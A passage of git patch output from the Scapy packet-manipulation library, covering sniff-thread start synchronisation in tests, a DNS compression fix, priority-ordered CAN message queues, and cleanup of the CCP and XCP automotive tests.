pkt: pkt, - "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1", + "started_callback": started.set}, name="tests bridge_and_sniff 3") t_bridge.start() +started.wait(timeout=5) = Send five IP packets from 192.0.2.1 to the tun0 **interface** -time.sleep(1) conf.route.add(net="192.0.2.2/32", dev="tun0") send([IP(src="192.0.2.1", dst="192.0.2.2") / ICMP()], count=5, iface="tun0") conf.route.delt(net="192.0.2.2/32", dev="tun0") @@ -156,12 +177,15 @@ assert not t_sniff.is_alive() = Run a sniff thread on the tun1 **interface** * It will terminate when 5 IP packets from 198.51.100.1 have been sniffed +started = threading.Event() t_sniff = Thread(target=sniff, kwargs={"iface": "tun1", "count": 5, "prn": Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "198.51.100.1"}, + "lfilter": lambda p: IP in p and p[IP].src == "198.51.100.1", + "started_callback": started.set}, name="tests sniff 4") t_sniff.start() +started.wait(timeout=5) = Run a bridge_and_sniff thread between the tuns **sockets** * It will "NAT" packets from 192.0.2.1 to 198.51.100.1 and will terminate when 5 IP packets have been forwarded @@ -172,15 +196,17 @@ def nat_1_2(pkt): return pkt return False +started = threading.Event() t_bridge = Thread(target=bridge_and_sniff, args=(tun0, tun1), kwargs={"store": False, "count": 5, 'prn': Packet.summary, "xfrm12": nat_1_2, - "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1", + "started_callback": started.set}, name="tests bridge_and_sniff 4") t_bridge.start() +started.wait(timeout=5) = Send five IP packets from 192.0.2.1 to the tun0 **interface** -time.sleep(1) conf.route.add(net="192.0.2.2/32", dev="tun0") send([IP(src="192.0.2.1", dst="192.0.2.2") / ICMP()], count=5, iface="tun0") conf.route.delt(net="192.0.2.2/32", dev="tun0") @@ -224,6 +250,7 @@ with VEthPair('a_0', 'a_1') as veth_0: global xfrm_count xfrm_count[pkt.sniffed_on] = xfrm_count[pkt.sniffed_on] + 1 return True + started = threading.Event() t_bridge = Thread(target=bridge_and_sniff, args=('a_0', 'b_0'), kwargs={ @@ -231,10 +258,11 @@ with VEthPair('a_0', 'a_1') as veth_0: 'xfrm21': xfrm_x, 'store': False, 'count': 4, - 'lfilter': lambda p: Ether in p and p[Ether].type == 0xbeef}, + 'lfilter': lambda p: Ether in p and p[Ether].type == 0xbeef, + "started_callback": started.set}, name="tests bridge_and_sniff VEthPair") t_bridge.start() - time.sleep(1) + started.wait(timeout=5) # send frames in both directions for if_name in ['a_1', 'b_1', 'a_1', 'b_1']: sendp([Ether(type=0xbeef) / @@ -262,10 +290,15 @@ import time tap0 = TunTapInterface("tap0") +if six.PY2: + chk_kwargs = {} +else: + chk_kwargs = {"timeout": 3} + if LINUX: - assert subprocess.check_call(["ip", "link", "set", "tap0", "up"]) == 0 + assert subprocess.check_call(["ip", "link", "set", "tap0", "up"], **chk_kwargs) == 0 else: - assert subprocess.check_call(["ifconfig", "tap0", "up"]) == 0 + assert subprocess.check_call(["ifconfig", "tap0", "up"], **chk_kwargs) == 0 = Check for arpleak @@ -296,13 +329,16 @@ def answer_arp_leak(pkt): tap0.send(ans) print('Answered!') +started = threading.Event() t_answer = Thread( target=sniff, kwargs={"prn": answer_arp_leak, "timeout": 10, "store": False, - "opened_socket": tap0}, + "opened_socket": tap0, + "started_callback": started.set}, name="tests answer_arp_leak") t_answer.start() +started.wait(timeout=5) @mock.patch("scapy.layers.l2.get_if_addr") @mock.patch("scapy.layers.l2.get_if_hwaddr") @@ -312,8 +348,6 @@ def test_arpleak(mock_get_if_hwaddr, mock_get_if_addr, hwlen=255, plen=255): mock_get_if_hwaddr.side_effect = lambda _: "00:01:02:03:04:05" return arpleak("192.0.2.2/31", timeout=2, hwlen=hwlen, plen=plen) -time.sleep(2) - ans, unans = test_arpleak() assert len(ans) == 1 assert len(unans) == 1 diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index 95b6b9dc28f..a2f3c55cdd9 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -117,7 +117,8 @@ def run_openssl_client(msg, suite="", version="", tls13=False, client_auth=False if sess_out: args.extend(["-sess_out", sess_out]) p = subprocess.Popen( - args, + " ".join(args), + shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT ) msg += b"\nstop_server\n" From 511d6198cf89f3c209b38a9e4bba4469c198ab13 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 9 Feb 2021 14:29:53 +0100 Subject: [PATCH 0504/1632] Fix DNS compression with small indexes --- scapy/layers/dns.py | 12 +++++++----- test/scapy/layers/dns.uts | 17 ++++++++++++++++- 2 files changed, 23 insertions(+), 6 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index d98f966ddb0..d42db9d2d51 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -172,7 +172,6 @@ def possible_shortens(dat): for x in range(1, dat.count(b".")): yield dat.split(b".", x)[x] data = {} - burned_data = 0 for current, name, dat in field_gen(dns_pkt): for part in possible_shortens(dat): # Encode the data @@ -182,18 +181,21 @@ def possible_shortens(dat): # possible pointer for future strings. # We get the index of the encoded data index = build_pkt.index(encoded) - index -= burned_data # The following is used to build correctly the pointer fb_index = ((index >> 8) | 0xc0) sb_index = index - (256 * (fb_index - 0xc0)) pointer = chb(fb_index) + chb(sb_index) - data[part] = [(current, name, pointer)] + data[part] = [(current, name, pointer, index + 1)] else: # This string already exists, let's mark the current field # with it, so that it gets compressed data[part].append((current, name)) - # calculate spared space - burned_data += len(encoded) - 2 + _in = data[part][0][3] + build_pkt = build_pkt[:_in] + build_pkt[_in:].replace( + encoded, + b"\0\0", + 1 + ) break # Apply compression rules for ck in data: diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index b3da10e6741..2f052d56aaf 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -169,8 +169,11 @@ assert raw(p) == b'\x00\x01\x01\x80\x00\x00\x00\x01\x00\x00\x00\x00\x06secdev\x0 = DNS - Malformed DNS over TCP message +_old_dbg = conf.debug_dissector +conf.debug_dissector = True + try: - p = IP(IP(raw(IP()/TCP()/DNS(length=28))[:-13])) + p = IP(raw(IP()/TCP()/DNS(length=28))[:-13]) assert False except Scapy_Exception as e: assert str(e) == "Malformed DNS message: too small!" @@ -181,6 +184,8 @@ try: except Scapy_Exception as e: assert str(e) == "Malformed DNS message: invalid length!" +conf.debug_dissector = _old_dbg + = DNS - dns_compress on decompressed packet data = b'E\x00\x00n~\x82\x00\x00{\x11\xae\xeb\x08\x08\x08\x08\x01\x01\x01\x01\x005\x005\x00Z!\x17\x00\x00\x81\x80\x00\x01\x00\x00\x00\x01\x00\x00\x03www\x06google\x03com\x00\x00\x0f\x00\x01\xc0\x10\x00\x06\x00\x01\x00\x00\x002\x00&\x03ns1\xc0\x10\tdns-admin\xc0\x10\x14Po\x8f\x00\x00\x03\x84\x00\x00\x03\x84\x00\x00\x07\x08\x00\x00\x00<' @@ -198,6 +203,16 @@ assert p.ns.rrname == b"google.com." assert p.ns.mname == b"ns1.google.com." assert p.ns.rname == b"dns-admin.google.com." += DNS - dns_compress on close indexes + +p = dns_compress(DNS(qd=DNSQR(qname=b'scapy.'), an=DNSRR(rrname=b'scapy.'), ar=DNSRROPT(rrname=b'.'))) +assert raw(p) == b'\x00\x00\x01\x00\x00\x01\x00\x01\x00\x00\x00\x01\x05scapy\x00\x00\x01\x00\x01\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00)\x10\x00\x00\x00\x80\x00\x00\x00' + +p = DNS(raw(p)) +assert p.qd.qname == b'scapy.' +assert p.an.rrname == b'scapy.' +assert p.ar.rrname == b'.' + = DNS - dns_encode edge cases assert dns_encode(b"www.google.com") == b'\x03www\x06google\x03com\x00' From 6819e9ebf3aafb54c5622d6690a7bc04fbcde65f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 10 Feb 2021 12:09:45 +0100 Subject: [PATCH 0505/1632] Use PriorityQueue internally in PythonCANSockets (#3061) * This PR adds a priority queue on python-can sockets to ensure the right order of packets. Incorrect order of CAN packets in PythonCANSockets are a long existing bug in Scapy and probably the reason for most instability in Unit Tests. This PR consists of the following changes: * Use PriorityQueue in python_can Socket Multiplexers * Introduce prio counter to not have message inversion on identical time stamps * enable isotp.uts on non root CI systems to check stability of change * add additional unit test * Enable unstable isotpscan tests to see if this PR has an effect on them * Validate if PriorityQueue is causing the stability I'm seeing in the tests * Validate again. This time remove prio code which shouldn't had any effect * Revert "Validate again. This time remove prio code which shouldn't had any effect" This reverts commit bd1d868d0277b7ae43a785c23ebd6e27b3d1b753. * Revert "Validate if PriorityQueue is causing the stability I'm seeing in the tests" This reverts commit a25c579d0d6b6d99b53a3670ca8d0d8a07f13fbf. * disable some long tests * fix rebase bug * minor addition to __lt__ operator * Add a comment why priority is necessary * fix unit test --- scapy/contrib/cansocket_python_can.py | 67 ++++++++++++++++++++++----- scapy/contrib/isotp.py | 2 + test/contrib/isotp.uts | 15 ++++++ test/contrib/isotpscan.uts | 14 +++--- 4 files changed, 79 insertions(+), 19 deletions(-) diff --git a/scapy/contrib/cansocket_python_can.py b/scapy/contrib/cansocket_python_can.py index a82d526b451..456091c818a 100644 --- a/scapy/contrib/cansocket_python_can.py +++ b/scapy/contrib/cansocket_python_can.py @@ -13,7 +13,6 @@ import time import struct import threading -import copy from functools import reduce from operator import add @@ -23,26 +22,70 @@ from scapy.layers.can import CAN from scapy.error import warning from scapy.modules.six.moves import queue +from scapy.compat import Any, List from can import Message as can_Message from can import CanError as can_CanError from can import BusABC as can_BusABC from can.interface import Bus as can_Bus +class PriotizedCanMessage(object): + """Helper object for comparison of CAN messages. If the timestamps of two + messages are equal, the counter value of a priority counter, is used + for comparison. It's only important that this priority counter always + get increased for every CAN message in the receive heapq. This compensates + a low resolution of `time.time()` on some operating systems. + """ + def __init__(self, msg, count): + # type: (can_Message, int) -> None + self.msg = msg + self.count = count + + def __eq__(self, other): + # type: (Any) -> bool + if not isinstance(other, PriotizedCanMessage): + return False + return self.msg.timestamp == other.msg.timestamp and \ + self.count == other.count + + def __lt__(self, other): + # type: (Any) -> bool + if not isinstance(other, PriotizedCanMessage): + return False + return self.msg.timestamp < other.msg.timestamp or \ + (self.msg.timestamp == other.msg.timestamp and + self.count < other.count) + + def __le__(self, other): + # type: (Any) -> bool + return self == other or self < other + + def __gt__(self, other): + # type: (Any) -> bool + return not self <= other + + def __ge__(self, other): + # type: (Any) -> bool + return not self < other + + class SocketMapper: def __init__(self, bus, sockets): - self.bus = bus # type: can_BusABC - self.sockets = sockets # type: list[SocketWrapper] + # type: (can_BusABC, List[SocketWrapper]) -> None + self.bus = bus + self.sockets = sockets def mux(self): while True: + prio_count = 0 try: msg = self.bus.recv(timeout=0) if msg is None: return for sock in self.sockets: if sock._matches_filters(msg): - sock.rx_queue.put(copy.copy(msg)) + prio_count += 1 + sock.rx_queue.put(PriotizedCanMessage(msg, prio_count)) except Exception as e: warning("[MUX] python-can exception caught: %s" % e) @@ -57,7 +100,7 @@ def __new__(cls): SocketsPool.__instance.pool_mutex = threading.Lock() return SocketsPool.__instance - def internal_send(self, sender, msg): + def internal_send(self, sender, msg, prio=0): with self.pool_mutex: try: mapper = self.pool[sender.name] @@ -68,9 +111,7 @@ def internal_send(self, sender, msg): if not sock._matches_filters(msg): continue - m = copy.copy(msg) - m.timestamp = time.time() - sock.rx_queue.put(m) + sock.rx_queue.put(PriotizedCanMessage(msg, prio)) except KeyError: warning("[SND] Socket %s not found in pool" % sender.name) except can_CanError as e: @@ -118,19 +159,22 @@ class SocketWrapper(can_BusABC): def __init__(self, *args, **kwargs): super(SocketWrapper, self).__init__(*args, **kwargs) - self.rx_queue = queue.Queue() # type: queue.Queue[can_Message] + self.rx_queue = queue.PriorityQueue() # type: queue.PriorityQueue[PriotizedCanMessage] # noqa: E501 self.name = None + self.prio_counter = 0 SocketsPool().register(self, *args, **kwargs) def _recv_internal(self, timeout): SocketsPool().multiplex_rx_packets() try: - return self.rx_queue.get(block=True, timeout=timeout), True + pm = self.rx_queue.get(block=True, timeout=timeout) + return pm.msg, True except queue.Empty: return None, True def send(self, msg, timeout=None): - SocketsPool().internal_send(self, msg) + self.prio_counter += 1 + SocketsPool().internal_send(self, msg, self.prio_counter) def shutdown(self): SocketsPool().unregister(self) @@ -165,6 +209,7 @@ def send(self, x): arbitration_id=x.identifier, dlc=x.length, data=bytes(x)[8:]) + msg.timestamp = time.time() try: x.sent_time = time.time() except AttributeError: diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index 084aee6f97c..62271a63e7f 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -1234,8 +1234,10 @@ def _tx_timer_handler(self): if self.tx_gap == 0: continue else: + # stop and wait for tx gap self.tx_timeout_handle = TimeoutScheduler.schedule( self.tx_gap, self._tx_timer_handler) + return def on_recv(self, cf): """Function that must be called every time a CAN frame is received, to diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index ccbc28134e8..65991a4f866 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -1602,6 +1602,21 @@ assert len(result) == 1 assert(result[0].data == isotp.data) += Two ISOTPSockets at the same time, sending and receiving with tx_gap + +with new_can_socket0() as cs1, ISOTPSocket(cs1, sid=0x641, did=0x241, rx_separation_time_min=1) as s1, \ + new_can_socket0() as cs2, ISOTPSocket(cs2, sid=0x241, did=0x641) as s2: + isotp = ISOTP(data=b"\x10\x25" * 43) + def sender(): + s2.send(isotp) + t = Thread(target=sender) + result = s1.sniff(count=1, timeout=5, started_callback=t.start) + t.join(timeout=5) + +assert len(result) == 1 +assert(result[0].data == isotp.data) + + = Two ISOTPSockets at the same time, multiple sends/receives with new_can_socket0() as cs1, ISOTPSocket(cs1, sid=0x641, did=0x241) as s1, \ new_can_socket0() as cs2, ISOTPSocket(cs2, sid=0x241, did=0x641) as s2: diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index ca5d01ff89c..f4bbcc5bf58 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -1,14 +1,12 @@ % Regression tests for ISOTPScan - -# Currently too unstable - -~ disabled +* Some tests are disabled to lower the CI utilitzation + Configuration ~ conf = Imports import scapy.modules.six as six +from scapy.contrib.isotp import send_multiple_ext, filter_periodic_packets, scan_extended, scan if six.PY3: exec(open("test/contrib/automotive/interface_mockup.py").read()) @@ -737,15 +735,15 @@ test_dynamic(test_isotpscan_text_extended_can_id) test_dynamic(test_isotpscan_code) = Test ISOTPScan with noise (output_format=code) - +~ disabled test_dynamic(test_isotpscan_code_noise) = Test extended ISOTPScan(output_format=code) - +~ disabled test_dynamic(test_extended_isotpscan_code) = Test extended ISOTPScan(output_format=code) extended_can_id - +~ disabled test_dynamic(test_extended_isotpscan_code_extended_can_id) = Test ISOTPScan(output_format=None) @@ -765,7 +763,7 @@ test_dynamic(test_extended_isotpscan_none) test_dynamic(test_isotpscan_none_random_ids) = Test ISOTPScan(output_format=None) random IDs padding - +~ disabled test_dynamic(test_isotpscan_none_random_ids_padding) + Cleanup From dfaabaa769e7156355b133fb9792c6657dc1d8d4 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 8 Feb 2021 09:25:34 +0100 Subject: [PATCH 0506/1632] Cleanup CCP and XCP tests --- test/contrib/automotive/ccp.uts | 88 +--------- test/contrib/automotive/gm/gmlanutils.uts | 1 - test/contrib/automotive/interface_mockup.py | 56 +++--- test/contrib/automotive/xcp/xcp.uts | 185 +------------------- test/contrib/automotive/xcp/xcp_comm.uts | 126 +++++++++++++ 5 files changed, 169 insertions(+), 287 deletions(-) create mode 100644 test/contrib/automotive/xcp/xcp_comm.uts diff --git a/test/contrib/automotive/ccp.uts b/test/contrib/automotive/ccp.uts index db157728362..873103b985a 100644 --- a/test/contrib/automotive/ccp.uts +++ b/test/contrib/automotive/ccp.uts @@ -1,89 +1,15 @@ % Regression tests for the CCP layer -~ needs_root + Configuration ~ conf = Imports -load_layer("can", globals_dict=globals()) -conf.contribs['CAN']['swap-bytes'] = False import scapy.modules.six as six -from subprocess import call -from scapy.consts import LINUX - -= Definition of constants, utility functions and mock classes -iface0 = "vcan0" -iface1 = "vcan1" - - -= Initialize a virtual CAN interface -~ vcan_socket needs_root linux -if 0 != call(["cansend", iface0, "000#"]): - # vcan0 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface0, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface0) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface0, "up"]): - raise Exception("could not bring up %s" % iface0) - -if 0 != call(["cansend", iface0, "000#"]): - raise Exception("cansend doesn't work") - -if 0 != call(["cansend", iface1, "000#"]): - # vcan1 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface1, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface1) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface1, "up"]): - raise Exception("could not bring up %s" % iface1) - -if 0 != call(["cansend", iface1, "000#"]): - raise Exception("cansend doesn't work") - -print("CAN should work now") - -= Import CANSocket - -from scapy.contrib.cansocket_python_can import * - -new_can_socket = lambda iface: CANSocket(bustype='virtual', channel=iface) -new_can_socket0 = lambda: CANSocket(bustype='virtual', channel=iface0, timeout=0.01) -new_can_socket1 = lambda: CANSocket(bustype='virtual', channel=iface1, timeout=0.01) - -# utility function for draining a can interface, asserting that no packets are there -def drain_bus(iface=iface0, assert_empty=True): - with new_can_socket(iface) as s: - pkts = s.sniff(timeout=0.1) - if assert_empty: - assert len(pkts) == 0 - -print("CAN sockets should work now") - -= Overwrite definition for vcan_socket systems native sockets -~ vcan_socket not_pypy needs_root linux - -if six.PY3 and LINUX: - from scapy.contrib.cansocket_native import * - new_can_socket = lambda iface: CANSocket(iface) - new_can_socket0 = lambda: CANSocket(iface0) - new_can_socket1 = lambda: CANSocket(iface1) - - -= Overwrite definition for vcan_socket systems python-can sockets -~ vcan_socket needs_root linux - -if "python_can" in CANSocket.__module__: - new_can_socket = lambda iface: CANSocket(bustype='socketcan', channel=iface, bitrate=250000, timeout=0.01) - new_can_socket0 = lambda: CANSocket(bustype='socketcan', channel=iface0, bitrate=250000, timeout=0.01) - new_can_socket1 = lambda: CANSocket(bustype='socketcan', channel=iface1, bitrate=250000, timeout=0.01) - - -= Verify that a CAN socket can be created and closed -s = new_can_socket(iface0) -s.close() +if six.PY3: + exec(open("test/contrib/automotive/interface_mockup.py").read()) +else: + execfile("test/contrib/automotive/interface_mockup.py") ############ ############ @@ -1031,10 +957,6 @@ assert dto.MTA0_address == 0xffffffff + Cleanup = Delete vcan interfaces -~ vcan_socket needs_root linux -if 0 != call(["sudo", "ip", "link", "delete", iface0]): - raise Exception("%s could not be deleted" % iface0) +assert cleanup_interfaces() -if 0 != call(["sudo", "ip", "link", "delete", iface1]): - raise Exception("%s could not be deleted" % iface1) diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 0bc7cb0fc8b..7a9ff4746bd 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -1,5 +1,4 @@ % Regression tests for gmlanutil -~ needs_root + Configuration ~ conf diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index c5939441f2f..00c2b3e5ffb 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -12,7 +12,7 @@ from platform import python_implementation -from scapy.all import load_layer, load_contrib, conf +from scapy.all import load_layer, load_contrib, conf, log_runtime import scapy.modules.six as six from scapy.consts import LINUX @@ -31,43 +31,49 @@ _root = False _not_pypy = "pypy" not in python_implementation().lower() +_socket_can_support = False def test_and_setup_socket_can(iface_name): - if 0 != subprocess.call(["cansend", iface_name, "000#"]): + if 0 != subprocess.call(("cansend %s 000#" % iface_name).split()): # iface_name is not enabled - if 0 != subprocess.call(["sudo", "modprobe", "vcan"]): + if 0 != subprocess.call("modprobe vcan".split()): raise Exception("modprobe vcan failed") - if 0 != subprocess.call(["sudo", "ip", "link", "add", "name", - iface_name, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface_name) if 0 != subprocess.call( - ["sudo", "ip", "link", "set", "dev", iface_name, "up"]): + ("ip link add name %s type vcan" % iface_name).split()): + log_runtime.debug( + "add %s failed: Maybe it was already up?" % iface_name) + if 0 != subprocess.call( + ("ip link set dev %s up" % iface_name).split()): raise Exception("could not bring up %s" % iface_name) - if 0 != subprocess.call(["cansend", iface_name, "000#"]): + if 0 != subprocess.call(("cansend %s 000#12" % iface_name).split()): raise Exception("cansend doesn't work") + sys.__stderr__.write("SocketCAN setup done!\n") + + +if LINUX and _root and _not_pypy: + test_and_setup_socket_can(iface0) + test_and_setup_socket_can(iface1) + log_runtime.debug("CAN should work now") + _socket_can_support = True -if LINUX and os.geteuid() == 0: - try: - test_and_setup_socket_can(iface0) - test_and_setup_socket_can(iface1) - print("CAN should work now") - except Exception as e: - print(e) + +sys.__stderr__.write("SocketCAN support: %s\n" % _socket_can_support) # ############################################################################ # """ Define helper functions for CANSocket creation on all platforms """ # ############################################################################ -if LINUX and _not_pypy and _root: +if _socket_can_support: if six.PY3: from scapy.contrib.cansocket_native import * new_can_socket = NativeCANSocket new_can_socket0 = lambda: NativeCANSocket(iface0) new_can_socket1 = lambda: NativeCANSocket(iface1) can_socket_string_list = ["-c", iface0] + sys.__stderr__.write("Using NativeCANSocket\n") else: from scapy.contrib.cansocket_python_can import * @@ -75,12 +81,14 @@ def test_and_setup_socket_can(iface_name): new_can_socket0 = lambda: PythonCANSocket(bustype='socketcan', channel=iface0, timeout=0.01) new_can_socket1 = lambda: PythonCANSocket(bustype='socketcan', channel=iface1, timeout=0.01) can_socket_string_list = ["-i", "socketcan", "-c", iface0] + sys.__stderr__.write("Using PythonCANSocket socketcan\n") else: from scapy.contrib.cansocket_python_can import * new_can_socket = lambda iface: PythonCANSocket(bustype='virtual', channel=iface) new_can_socket0 = lambda: PythonCANSocket(bustype='virtual', channel=iface0, timeout=0.01) new_can_socket1 = lambda: PythonCANSocket(bustype='virtual', channel=iface1, timeout=0.01) + sys.__stderr__.write("Using PythonCANSocket virtual\n") # ############################################################################ @@ -88,8 +96,11 @@ def test_and_setup_socket_can(iface_name): # ############################################################################ s = new_can_socket(iface0) s.close() +del s + s = new_can_socket(iface1) s.close() +del s def cleanup_interfaces(): @@ -105,9 +116,9 @@ def cleanup_interfaces(): t.join(10) if LINUX and _not_pypy and _root: - if 0 != subprocess.call(["sudo", "ip", "link", "delete", iface0]): + if 0 != subprocess.call(["ip", "link", "delete", iface0]): raise Exception("%s could not be deleted" % iface0) - if 0 != subprocess.call(["sudo", "ip", "link", "delete", iface1]): + if 0 != subprocess.call(["ip", "link", "delete", iface1]): raise Exception("%s could not be deleted" % iface1) return True @@ -127,7 +138,10 @@ def drain_bus(iface=iface0, assert_empty=True): "Error in drain_bus. Packets found but no packets expected!") -print("CAN sockets should work now") +drain_bus(iface0) +drain_bus(iface1) + +log_runtime.debug("CAN sockets should work now") # ############################################################################ # """ Setup and definitions for ISOTP related stuff """ @@ -154,7 +168,7 @@ def exit_if_no_isotp_module(): # ############################################################################ # """ Evaluate if ISOTP kernel module is installed and available """ # ############################################################################ -if LINUX and os.geteuid() == 0 and six.PY3: +if LINUX and _root and six.PY3: p1 = subprocess.Popen(['lsmod'], stdout=subprocess.PIPE) p2 = subprocess.Popen(['grep', '^can_isotp'], stdout=subprocess.PIPE, stdin=p1.stdout) @@ -193,5 +207,5 @@ def exit_if_no_isotp_module(): # """ Prepare send_delay on Ecu Answering Machine to stabilize unit tests """ # ############################################################################ from scapy.contrib.automotive.ecu import * -print("Set send delay to lower utilization on CI machines") +log_runtime.debug("Set send delay to lower utilization on CI machines") conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.004 diff --git a/test/contrib/automotive/xcp/xcp.uts b/test/contrib/automotive/xcp/xcp.uts index f65814b5528..69175764ded 100644 --- a/test/contrib/automotive/xcp/xcp.uts +++ b/test/contrib/automotive/xcp/xcp.uts @@ -1,24 +1,15 @@ % Regression tests for the XCP -~ needs_root - # More information at http://www.secdev.org/projects/UTscapy/ ############ ############ + Basic operations -= Imports - -from scapy.config import conf -from scapy.contrib.automotive.xcp.cto_commands_master import GetCommModeInfo, GetStatus, GetSeed, Unlock, GetId, Upload, GetCalPage, SetMta, BuildChecksum, Download, ShortUpload, CopyCalPage, GetDaqProcessorInfo, GetDaqResolutionInfo, GetDaqEventInfo, GetDaqListInfo, ClearDaqList, AllocDaq, AllocOdt, AllocOdtEntry, SetDaqPtr, WriteDaq, SetDaqListMode, StartStopDaqList, GetDaqClock, StartStopSynch, ProgramStart, ProgramClear, Program -from scapy.contrib.automotive.xcp.cto_commands_slave import NegativeResponse -from scapy.contrib.automotive.xcp.xcp import CTORequest, CTOResponse -from scapy.main import load_layer - = Load module load_layer("can", globals_dict=globals()) +conf.contribs['CAN']['swap-bytes'] = False load_contrib("automotive.xcp.xcp", globals_dict=globals()) @@ -27,7 +18,8 @@ load_contrib("automotive.xcp.xcp", globals_dict=globals()) conf.contribs["XCP"]["add_padding_for_can"] = True pkt = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() -build_pkt = pkt.do_build() +build_pkt = bytes(pkt) +hexdump(build_pkt) assert build_pkt == b'\x00\x00\x07\x00\x08\x00\x00\x00\xff\x00\xcc\xcc\xcc\xcc\xcc\xcc' conf.contribs["XCP"]["add_padding_for_can"] = False @@ -589,176 +581,7 @@ assert cto_response.packet_code == 0xFF assert cto_response.answers(cto_request) -+ Tests on a virtual CAN-Bus -= Imports - -import threading -import time -from subprocess import call - -import scapy.modules.six as six -from scapy.contrib.automotive.xcp.cto_commands_master import Connect -from scapy.contrib.automotive.xcp.xcp import CTORequest, XCPOnCAN, CTOResponse, ConnectPositiveResponse -from scapy.main import load_layer - -= Load module - -load_layer("can", globals_dict=globals()) -load_contrib("automotive.xcp.xcp", globals_dict=globals()) - -= Global variables - -iface_name = "vcan_xcp" - -= Initialize a virtual CAN interface -~ vcan_socket needs_root linux - -print('setting up CAN') - -if 0 != call(["cansend", iface_name, "000#"]): - # vcan0 is not enabled - if 0 != call(["sudo", "modprobe", "vcan"]): - raise Exception("modprobe vcan failed") - if 0 != call(["sudo", "ip", "link", "add", "name", iface_name, "type", "vcan"]): - print("add %s failed: Maybe it was already up?" % iface_name) - if 0 != call(["sudo", "ip", "link", "set", "dev", iface_name, "up"]): - raise Exception("could not bring up %s" % iface_name) - -if 0 != call(["cansend", iface_name, "000#"]): - raise Exception("cansend doesn't work") - -print("CAN should work now") - - -= Define new_can_socket0 for root and linux -~ vcan_socket needs_root linux -if six.PY3 and not conf.use_pypy: - from scapy.contrib.cansocket_native import CANSocket - new_can_socket0 = lambda: CANSocket(iface_name) - print("Using Native CANSocket on " + iface_name) -else: - from scapy.contrib.cansocket_python_can import CANSocket - new_can_socket0 = lambda: CANSocket(bustype='socketcan', channel=iface_name, bitrate=250000, timeout=0.01) - print("Using Soft CANSocket on " + iface_name) - -= Define new_can_socket0 without root or linux -if "new_can_socket0" not in globals(): - from scapy.contrib.cansocket_python_can import CANSocket - new_can_socket0 = lambda: CANSocket(bustype='virtual', channel=iface_name, timeout=0.01) - print("Using Soft CANSocket on virtual in-process can bus") - - -= verify CAN Socket creation works -s = new_can_socket0() -s.close() - - -= Connect -sock1 = new_can_socket0() -sock2 = new_can_socket0() - -sock1.basecls = XCPOnCAN -sock2.basecls = XCPOnCAN - -def ecu(): - pkts = sock2.sniff(count=1, timeout=5) - if len(pkts) == 1: - response = XCPOnCAN(identifier=0x700) / CTOResponse() / ConnectPositiveResponse(b'\x15\xC0\x08\x08\x00\x10\x10') - sock2.send(response) - -thread = threading.Thread(target=ecu) -thread.start() -time.sleep(0.1) -pkt = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() -ans = sock1.sr1(pkt, timeout=3) -thread.join(timeout=3) -sock1.close() -sock2.close() - -assert ans.identifier == 0x700 -cto_response = ans["CTOResponse"] -assert cto_response.packet_code == 0xff - -connect_response = cto_response["ConnectPositiveResponse"] - -assert connect_response.resource == 0x15 -assert connect_response.comm_mode_basic == 0xC0 -assert connect_response.max_cto == 8 -assert connect_response.max_dto is None -assert connect_response.max_dto_le == 8 - -assert connect_response.xcp_protocol_layer_version_number_msb == 0x10 -assert connect_response.xcp_transport_layer_version_number_msb == 0x10 - - -cto_request = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() - -assert cto_request.identifier == 0x700 -assert cto_request.pid == 0xFF -assert cto_request.connection_mode == 0 -assert bytes(cto_request) == b'\x00\x00\x07\x00\x02\x00\x00\x00\xff\x00' - -xcp_on_can = XCPOnCAN(b'\x00\x00\x05\x00\x08\x00\x00\x00\xff\x15\xC0\x08\x08\x00\x10\x10') -assert xcp_on_can.identifier == 0x500 -assert xcp_on_can.answers(cto_request) - -cto_response = xcp_on_can["CTOResponse"] -assert cto_response.packet_code == 0xFF - -connect_response = cto_response["ConnectPositiveResponse"] -assert connect_response.resource == 0x15 -assert connect_response.comm_mode_basic == 0xC0 -assert 